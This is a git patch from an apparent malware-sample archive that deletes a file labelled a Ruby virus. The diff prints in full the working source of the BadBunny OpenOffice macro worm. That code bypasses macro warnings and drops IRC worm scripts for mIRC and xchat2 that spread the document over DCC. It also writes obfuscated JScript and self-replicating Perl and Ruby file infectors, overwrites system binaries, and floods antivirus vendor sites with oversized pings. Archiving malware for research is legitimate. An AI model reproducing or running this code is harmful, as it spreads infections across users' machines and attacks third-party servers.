From 5d2e97bf16cfbeb969d280261c61086e8b3d71d2 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 17 Oct 2020 15:48:45 -0500 Subject: [PATCH] Delete Virus.Ruby.Badbunny.a N/A - Not Ruby Submitted by: https://github.com/saouddk --- Ruby/Virus.Ruby.Badbunny.a | 314 ------------------------------------- 1 file changed, 314 deletions(-) delete mode 100644 Ruby/Virus.Ruby.Badbunny.a diff --git a/Ruby/Virus.Ruby.Badbunny.a b/Ruby/Virus.Ruby.Badbunny.a deleted file mode 100644 index 05429dee..00000000 --- a/Ruby/Virus.Ruby.Badbunny.a +++ /dev/null @@ -1,314 +0,0 @@ -Dim Url As String -Dim myFileProp as Object - -Sub badbunny() -rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz] -Dim mEventProps(1) as new com.sun.star.beans.PropertyValue -mEventProps(0).Name = "EventType" -mEventProps(0).Value = "StarBasic" -mEventProps(1).Name = "Script" -mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame" -com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN -ThisComponent.LockControllers -oDocument = ThisComponent -otext=oDocument.text -ocursor=otext.createtextcursor() -otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false) -url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg") -oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() ) -msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\" -call ping -end sub - -sub startgame -if GetGUIType =1 then 'windows -call win -end if -if GetGUIType =3 then 'MacOS -call mac -end if -if GetGUIType =4 then 'linux -call lin -end if -end sub - -sub win -Dim dirz As String -Dim dummy() -Dim iVar As Integer -Dim Args(0) as new com.sun.star.beans.PropertyValue -Args(0).Name = "MacroExecutionMode" -Args(0).Value = _ -com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN -ThisComponent.LockControllers - datei="c:\badbunny.odg" - dateiurl=converttourl(datei) - odoc=thisComponent - odoc.storeasurl(dateiurl,dummy()) -dirz=Environ ("programfiles") - -Open "c:\drop.bad" For Output As #1 -Print #1, "[script]" -Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]" -Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*" -Print #1, "n2=on 1:start:{" -Print #1, "n3= /if $day == Friday { /echo }" -Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan" -Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-" -Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-" -Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me" -Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me" -Print #1, "n9=on 1:part:#:{" -Print #1, "n10=set %M_E $me" -Print #1, "n11=set %NickName $nick" -Print #1, "n12=set %ccd .dcc" -Print #1, "n13= if %NickName != %M_E {" -Print #1, "n14= /q %NickName lets do it like a rabbit...;)" -Print #1, "n15= /msg %NickName Be my bunny!" -Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg" -Print #1, "n17= }" -Print #1, "n18=}" -Close #1 - -if ( Dir(dirz &"\mirc") <> "") then -Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini" -end if -if ( Dir("c:\mirc") <> "") then -Filecopy "c:\drop.bad" , "c:\mirc\script.ini" - -end if -if ( Dir(dirz &"\mirc32") <> "") then -Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini" -end if -if ( Dir("c:\mirc32") <> "") then -Filecopy "c:\drop.bad" , "c:\mirc32\script.ini" -end if - -Open "c:\badbunny.js" For Output As #2 -Print #2, "// BadBunny" -Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))" -Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)" -Print #2, "var OurCode=me.Read(1759)" -Print #2, "me.Close()" -Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''" -Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()" -Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }" -Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)" -Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)" -Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())" -Print #2, "{" -Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")" -Print #2, "{" -Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)" -Print #2, "var Marker=filez.Read(11)" -Print #2, "var allinone=Marker+filez.ReadAll()" -Print #2, "filez.Close()" -Print #2, "if(Marker!=""// BadBunny"")" -Print #2, "{" -Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)" -Print #2, "filez.Write(OurCode+allinone)" -Print #2, "filez.Close()" -Print #2, "}" -Print #2, "}" -Print #2, "}" -Print #2, "function foundit()" -Print #2, "{" -Print #2, "fcodea=''; count=0; randon='';" -Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }" -Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }" -Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)" -Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '" -Print #2, "i+=fcodea.length;" -Print #2, "}" -Print #2, "//->" -Close #2 -Shell("c:\badbunny.js",0) -oDoc.store() -End Sub - -sub lin() -'xchat2worm part by WarGame -dim HomeDir as string -dim xchat2script as string -dim perlvir as string -dim cmd as string -dim WgeT as string -Dim dummy() -Dim iVar As Integer -Dim Args(0) as new com.sun.star.beans.PropertyValue -Args(0).Name = "MacroExecutionMode" -Args(0).Value = _ -com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN -ThisComponent.LockControllers - datei="/tmp/badbunny.odg" - dateiurl=converttourl(datei) - odoc=thisComponent - odoc.storeasurl(dateiurl,dummy()) - -' get home dir -HomeDir = Environ("HOME") - -'build the path of our xchat2 script -if HomeDir = "" then -' I could not get $HOME ! - -else -xchat2script = HomeDir & "/.xchat2/badbunny.py" - -' drop the python script -Open xchat2script For Output As #1 -print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34) -print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34) -print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34) -print #1,"import xchat" -print #1,"def onkick_cb(word, word_eol, userdata):" -print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:" -print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")" -print #1," return xchat.EAT_NONE" -print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)" -close #1 -endif - -'drop the perl virus -perlvir = HomeDir & "/BadBunny.pl" -open perlvir for output as #1 -print #1,"#BadBunny" -print #1,"open(File,$0);@MyCode = ;close(File);" -print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){" -print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){" -print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}" -close #1 -cmd = "perl " & perlvir -shell(cmd,0) - -oDoc.store() -end sub - -sub mac() -Dim iVar As Integer -iVar = Int((15 * Rnd) -2) -Select Case iVar -Case 1 To 5 -call one -Case 6, 7, 8 -call two -Case Is > 8 And iVar < 11 -call one -Case Else -call two -End Select -end sub - -sub one () -'thx to skyout -Open "badbunny.rb" For Output As #1 -print #1,"#!/usr/bin/env ruby" -print #1,"require 'ftools'" -print #1,"def replacecmd(cmdname, dirpath)" -print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")" -print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)" -print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n""" -print #1,"oldcmd.puts ""puts \""\""" -print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\""""" -print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny""""" -print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut""" -print #1,"oldcmd.puts ""puts \""\""""" -print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\""""" -print #1,"oldcmd.puts ""puts \""Executing in ...\""""" -print #1,"oldcmd.puts ""sleep 1""" -print #1,"oldcmd.puts ""puts \""3\""" -print #1,"oldcmd.puts ""sleep 1""" -print #1,"oldcmd.puts ""puts \""2\""" -print #1,"oldcmd.puts ""sleep 1""" -print #1,"oldcmd.puts ""puts \""1\""" -print #1,"oldcmd.puts ""sleep 1""" -print #1,"oldcmd.puts ""puts \""\""" -print #1,"oldcmd.puts ""for $args in $* do""" -print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\""" -print #1,"oldcmd.puts ""end""" -print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\""" -print #1,"oldcmd.puts ""exit 0""" -print #1,"end" -print #1,"$binary_dirs = Array.new" -print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]" -print #1,"for $dir in $binary_dirs do" -print #1,"if File.directory?($dir) then" -print #1,"if File.writable?($dir) then" -print #1,"Dir.open($dir).each do |file|" -print #1,"next if file =~ /^\S+_/ || file == ""."" || file == ""..""" -print #1,"replacecmd(file, $dir)" -print #1,"end" -print #1,"end" -print #1,"end" -print #1,"end" -print #1,"exit 0" -close #1 -Shell("badbunny.rb",0) -end sub - -sub two() 'thx to SPTH for this... -Open "badbunnya.rb" For Output As #2 -print #2,"# BADB" -print #2,"mycode=""" -print #2,"mych=File.open(__FILE__)" -print #2,"myc=mych.read(1)" -print #2,"while myc!=nil" -print #2,"mycode+=myc" -print #2,"myc=mych.read(1)" -print #2,"end" -print #2,"mycode=mycode[mycode.length-734,734]" -print #2,"cdir = Dir.open(Dir.getwd)" -print #2,"cdir.each do |a|" -print #2,"if File.ftype(a)==""file"" then" -print #2,"if a[a.length-3, a.length]=="".rb"" then" -print #2,"if a!=File.basename(__FILE__) then" -print #2,"fcode=""" -print #2,"fle=open(a)" -print #2,"badb=fle.read(1)" -print #2,"while badb!=nil" -print #2,"fcode+=badb" -print #2,"badb=fle.read(1)" -print #2,"end" -print #2,"fle.close" -print #2,"if fcode[fcode.length-732,4]!=""BADB"" then" -print #2,"fcode=fcode+13.chr+10.chr+mycode" -print #2,"fle=open(a,""w"")" -print #2,"fle.print fcode" -print #2,"fle.close" -print #2,"end" -print #2,"end" -print #2,"end" -print #2,"end" -print #2,"end" -print #2,"cdir.close" -close #2 -Shell("badbunnya.rb",0) -End Sub - -sub ping() -Shell("ping -l 5000 -t www.ikarus.at",0) -Shell("ping -l 5000 -t www.aladdin.com",0) -Shell("ping -l 5000 -t www.norman.no",0) -Shell("ping -l 5000 -t www.norman.com",0) -Shell("ping -l 5000 -t www.kaspersky.com",0) -Shell("ping -l 5000 -t www.kaspersky.ru",0) -Shell("ping -l 5000 -t www.kaspersky.pl",0) -Shell("ping -l 5000 -t www.grisoft.cz",0) -Shell("ping -l 5000 -t www.symantec.com",0) -Shell("ping -l 5000 -t www.proantivirus.com",0) -Shell("ping -l 5000 -t www.f-secure.com",0) -Shell("ping -l 5000 -t www.sophos.com",0) -Shell("ping -l 5000 -t www.arcabit.pl",0) -Shell("ping -l 5000 -t www.arcabit.com",0) -Shell("ping -l 5000 -t www.avira.com",0) -Shell("ping -l 5000 -t www.avira.de",0) -Shell("ping -l 5000 -t www.avira.ro",0) -Shell("ping -l 5000 -t www.avast.com",0) -Shell("ping -l 5000 -t www.virusbuster.hu",0) -Shell("ping -l 5000 -t www.trendmicro.com",0) -Shell("ping -l 5000 -t www.bitdefender.com",0) -Shell("ping -l 5000 -t www.pandasoftware.comm",0) -Shell("ping -l 5000 -t www.drweb.com",0) -Shell("ping -l 5000 -t www.drweb.ru",0) -Shell("ping -l 5000 -t www.viruslist.com",0) -end sub \ No newline at end of file